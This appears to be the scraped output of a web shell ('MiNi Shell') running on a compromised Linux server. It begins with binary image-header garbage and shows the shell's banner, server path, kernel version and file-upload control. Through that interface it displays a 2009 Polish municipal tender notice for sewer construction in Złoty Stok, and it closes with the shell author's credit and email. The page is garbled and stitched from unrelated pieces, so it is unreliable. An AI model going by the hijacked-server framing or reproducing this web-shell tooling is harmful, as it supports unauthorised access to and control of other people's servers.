JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090304/49182-N-2009.html

<p class="kh_header"><b>Złoty Stok: Budowa kanalizacji sanitarnej w Złotym Stoku - etap III, cz. 1.</b><br>
<b>Numer ogłoszenia: 49182 - 2009; data zamieszczenia: 04.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Złoty Stok , ul. Rynek 22, 57-250 Złoty Stok, tel. 0 74 8164164, faks 0 74 8164133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlotystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej w Złotym Stoku - etap III, cz. 1..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest inwestycja polegająca na wykonaniu Kanalizacji Sanitarnej w Złotym Stoku Etap III cz. 1. Prace obejmują budowę nowej kanalizacji, która umożliwi grawitacyjne odprowadzenie ścieków sanitarnych z dolnej - północnej części miasta, z obszaru leżącego między ul. Spacerową, pl. Kościuszki, ul. Wojska Polskiego i ul. Wiejską, a ograniczonego od, dołu, ul. Kłodzką. Inwestycja obejmuje również odprowadzenie ścieków sanitarnych z trzech budynków nr 1,2 i 3 przy ul. Chemików.
Średnia długość sieci kanalizacyjnej w rozbiciu na średnice wynosi: 
Kanały główne:
-	rura dwuścienna TU 306 (Dn 300) - L=531.5m
-	rura dwuścienna TU 206 (Dn 200) - L=2814m
-	rura dwuścienna TU 156 (Dn 150) - L=123.5m
Przyłącza domowe:
-	rura dwuścienna TU 206 (Dn 200) - L=29,5m
-	rura dwuścienna TU 206 (Dn 200) - L=1390m

W zakresie robót do wykonania są:
I. Roboty związane z budową kanalizacji sanitarnej 
Prace przygotowawcze i zabezpieczające terenu robót .
- opracowanie ogólnego harmonogramu prac,  
- pomiary geodezyjne przygotowawcze,
- prace zabezpieczające teren robót przed osobami postronnymi wraz z właściwym oznakowaniem,
- organizacja ruchu drogowego w przypadku konieczności zamknięcia ulic oraz zorganizowanie dojazdów i dojść zastępczych wraz z właściwym oznakowaniem,
- uzyskanie decyzji na zajęcie pasa drogowego w przypadku prowadzenia robót w pasie dróg wojewódzkich i krajowych,      
- prace przygotowawcze w zakresie różnych nawierzchni - rozebranie istniejących nawierzchni ulic(trylinka, płyty chodnikowe, mieszanka mineralno-bitumiczna)  w miejscach prowadzenia robót ziemnych.

Roboty ziemne. 
- wykonanie wykopów oraz przekopów pod sieć kanalizacyjną w gruncie kat IV  - 5752.314m3,
- wykonanie pionowych umocnień ścian wykopów liniowych pod sieć kanalizacyjną - 11376.226m2,
- wykonanie podłoża pod sieć kanalizacyjną z materiałów sypkich - podsypka piaskowa grub. 15cm - 268.275m3,
- wykonanie obsypki sieci kanalizacyjnej z materiałów sypkich - obsypka piaskowa grub. 25cm dla kanału o 300 - 56.807m3, obsypka piaskowa grub. 20cm dla kanału o 200 - 193.699m3, obsypka piaskowa grub. 15cm dla kanału o 156 - 7.788m3,
- zasypywanie wykopów spycharkami - 4618,9m3.

Roboty instalacyjne.
- wykonanie podstawy studni betonowych rewizyjnych z kręgów betonowych - 41.712m3,
- wykonanie studni rewizyjnych z kręgów betonowych o o 1000mm, łączonych na uszczelki gumowe, z dnem i wyprofilowaną kinetą, z włazami typu ciężkiego - drogi i podjazdy, lekkiego - chodniki i tereny zielone, z zamontowanymi stopniami zejściowymi - 123szt,
- wykonanie instalacji kanalizacyjnej z rur dwuściennych z polipropylenu łączonych na pierścienie uszczelniające osadzone w karbach na zewnątrz rury,
- montaż trójników karbowanych o 200 - 3 szt.

Roboty nawierzchniowe.
- wykonanie podbudowy z kruszywa łamanego warstwa dolna grub. po zagęszczeniu 15cm - 209.3m2, warstwa górna grub. po zagęszczeniu 8cm - 209.3m2,
- przywrócenie nawierzchni ulic, dojazdów, dojść i chodników z trylinki, płyt chodnikowych mieszanki bitumicznej do stanu pierwotnego.

Prace związane z odbiorami technicznymi, geodezyjnymi pomiarami powykonawczymi, uporządkowaniem terenu i  przekazaniem do eksploatacji.
- wykonanie prób wodnych szczelności kanałów rurowych,
- wywiezienie nadmiaru ziemi, gruzu, i innych powstałych odpadów,
- uporządkowanie budowy i przyległych terenów,
- wykonanie dokumentacji geodezyjnej powykonawczej.

II. Roboty związane z budową przyłączy.
Prace przygotowawcze i zabezpieczające terenu robót .
- opracowanie ogólnego harmonogramu prac,  
- pomiary geodezyjne przygotowawcze,
- prace zabezpieczające teren robót przed osobami postronnymi wraz z właściwym oznakowaniem,
- organizacja ruchu drogowego w przypadku konieczności zamknięcia ulic oraz zorganizowanie dojazdów i dojść zastępczych wraz z właściwym oznakowaniem, 
- uzyskanie decyzji na zajęcie pasa drogowego w przypadku prowadzenia robót w pasie dróg wojewódzkich i krajowych,    
- prace przygotowawcze w zakresie różnych nawierzchni - rozebranie istniejących nawierzchni ulic(trylinka, płyty chodnikowe, mieszanka mineralno-bitumiczna)  w miejscach prowadzenia robót ziemnych.

Roboty ziemne. 
- wykonanie wykopów oraz przekopów pod rurociągi kanalizacyjne w gruncie kat III - IV  - 1920.75m3,
- wykonanie pionowych umocnień ścian wykopów liniowych pod rurociągi kanalizacyjne - 4258.5m2,
- wykonanie podłoża pod rurociągi kanalizacyjne z materiałów sypkich - podsypka piaskowa grub. 15cm - 106.463m3,
- wykonanie obsypki  z materiałów sypkich - obsypka piaskowa grub. 20cm dla kanału o 200 - 2.024m3, obsypka piaskowa grub. 15cm dla kanału o 156 - 83.267m3,
- wykonanie zasypki piaskowej grub. 15cm dla rurociągów kanalizacyjnych - 106.463m3,
- zasypywanie wykopów spycharkami - 1593.675m3.

Roboty instalacyjne.
- wykonanie studzienek kanalizacyjnych systemowych o 315-415mm zamkniętych rurą teleskopową - 20szt, 
- wykonanie rurociągów kanalizacyjnych z rur dwuściennych z polipropylenu łączonych na pierścienie uszczelniające osadzone w karbach na zewnątrz rury.

Roboty nawierzchniowe.
- wykonanie podbudowy z kruszywa łamanego warstwa dolna grub. po zagęszczeniu 15cm - 144.75m2, warstwa górna grub. po zagęszczeniu 8cm - 144.75m2,
- przywrócenie nawierzchni ulic, dojazdów, dojść i chodników z trylinki, płyt chodnikowych mieszanki bitumicznej do stanu pierwotnego.

Prace związane z odbiorami technicznymi, geodezyjnymi pomiarami powykonawczymi, uporządkowaniem terenu i  przekazaniem do eksploatacji.
- wykonanie prób wodnych szczelności kanałów rurowych,
- wywiezienie nadmiaru ziemi, gruzu, i innych powstałych odpadów,
- uporządkowanie budowy i przyległych terenów,
- wykonanie dokumentacji geodezyjnej powykonawczej.

III. Wykonanie przejść kanałów pod drogami.
Prace przygotowawcze i zabezpieczające terenu robót .
- opracowanie ogólnego harmonogramu prac,  
- pomiary geodezyjne przygotowawcze,
- prace zabezpieczające teren robót przed osobami postronnymi wraz z właściwym oznakowaniem,
- organizacja ruchu drogowego w przypadku konieczności zamknięcia ulic oraz zorganizowanie dojazdów i dojść zastępczych wraz z właściwym oznakowaniem,
- uzyskanie decyzji na zajęcie pasa drogowego w przypadku prowadzenia robót w pasie dróg wojewódzkich i krajowych,     

Roboty ziemne. 
- wykonanie wykopów oraz przekopów w gruncie kat IV  - 303.75m3,
- wykonanie pionowych umocnień ścian wykopów liniowych  - 292.5m2,
- zasypywanie wykopów spycharkami - 303.75m3.

Wykonanie przejść pod drogami metodą przecisku lub przewiertu.
- przejście kanału po drogą krajową 46 - P1 ul. Kłodzka L=12m,
- przejście kanału po drogą wojewódzką 390 - P2 ul. Sudecka L=6.5m,
- przejście kanału po drogą wojewódzką 390 - P2 ul. Sudecka L=9.4m.

Roboty instalacyjne.
- przeciągnięcie przewodów rurowych przez rury ochronne przecisków

Prace związane z odbiorami technicznymi, geodezyjnymi pomiarami powykonawczymi, uporządkowaniem terenu i  przekazaniem do eksploatacji.
- wykonanie prób wodnych szczelności kanałów rurowych,
- wywiezienie nadmiaru ziemi, gruzu, i innych powstałych odpadów,
- uporządkowanie budowy i przyległych terenów,
- wykonanie dokumentacji geodezyjnej powykonawczej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.00.00-1, 45.10.00.00-8, 45.23.32.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział Wykonawcy, którzy: 
1)spełniają warunki wynikające z art. 22 ust.1 ustawy, tzn.: 
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, 
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia; 
2)wykażą się odpowiednim doświadczeniem, tj.: w ostatnich 5 latach, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej 1 podobne zadanie, odpowiadające rodzajem i wartością robotom budowlanym, stanowiącym przedmiot zamówienia.
3)wykażą się dysponowaniem osobami zdolnymi do wykonania zamówienia, tj.: posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, wydanych na podstawie ustawy z dn. 7 lipca 1994  Prawo budowlane (Dz.U.Nr 156 z 2006, poz. 1118, z późn. zm.) oraz rozporządzenia Ministra Transportu i Budownictwa z dn. 28 kwietnia 2006, w sprawie samodzielnych funkcji technicznych w budownictwie (Dz,U.Nr 83 z 2006, poz. 578), lub przepisów uprzednio obowiązujących w tym zakresie.
4)są ubezpieczeni od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej.
5)W przypadku gdy o udzielenie zamówienia ubiega się konsorcjum, wówczas wymaga się, aby żaden z jego członków nie podlegał wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy, a członkowie łącznie spełniali warunki określone w pkt 1 ust. 2-5 niniejszego rozdziału.
6)Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu na podstawie złożonych w ofercie oświadczeń i dokumentów. Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Na potwierdzenie spełniania warunków udziału w postępowaniu, określonych w rozdziale VI niniejszej specyfikacji, Wykonawcy muszą przedstawić następujące dokumenty: 
a - oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 Prawa zamówień publicznych (zał. 3 do SIWZ)
b - wykaz wykonanych robót budowlanych - zgodnie z pkt 2, rozdz. VI SIWZ,  (zał. 4 do SIWZ) oraz  dokumenty, że roboty zostały wykonane należycie, np. referencje.
c - wykaz osób, które będą uczestniczyć w realizacji zamówienia - zgodnie z  pkt 3, rozdz. VI SIWZ (zał. 5 do SIWZ)
d - polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
e - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
f - oświadczenie potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne lub społeczne w Zakładzie Ubezpieczeń Społecznych lub w Kasie Rolniczego Ubezpieczenia Społecznego, lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu.
2.Dokumenty, o których mowa w rozdziale VII niniejszej specyfikacji, należy przedstawić w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez osobę/y uprawnioną/e do reprezentacji Wykonawcy.
3.W przypadku konsorcjum dokumenty wymienione w rozdziale VII niniejszej specyfikacji przedstawia każdy z członków konsorcjum. Pozostałe dokumenty mogą być przedstawione przez jednego Wykonawcę lub wspólnie.
4.W przypadku konsorcjum do oferty musi być załączony dokument ustanawiający pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i przy zawarciu umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zlotystok.biuletyn.net.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Złotym Stoku
Rynek 22
57-250 Złoty Stok
pok. 22.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2009 godzina 09:00, miejsce: Urząd Miejski w Złotym Stoku
Rynek 22
57-250 Złoty Stok
pok. 7  sekretariat urzędu.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com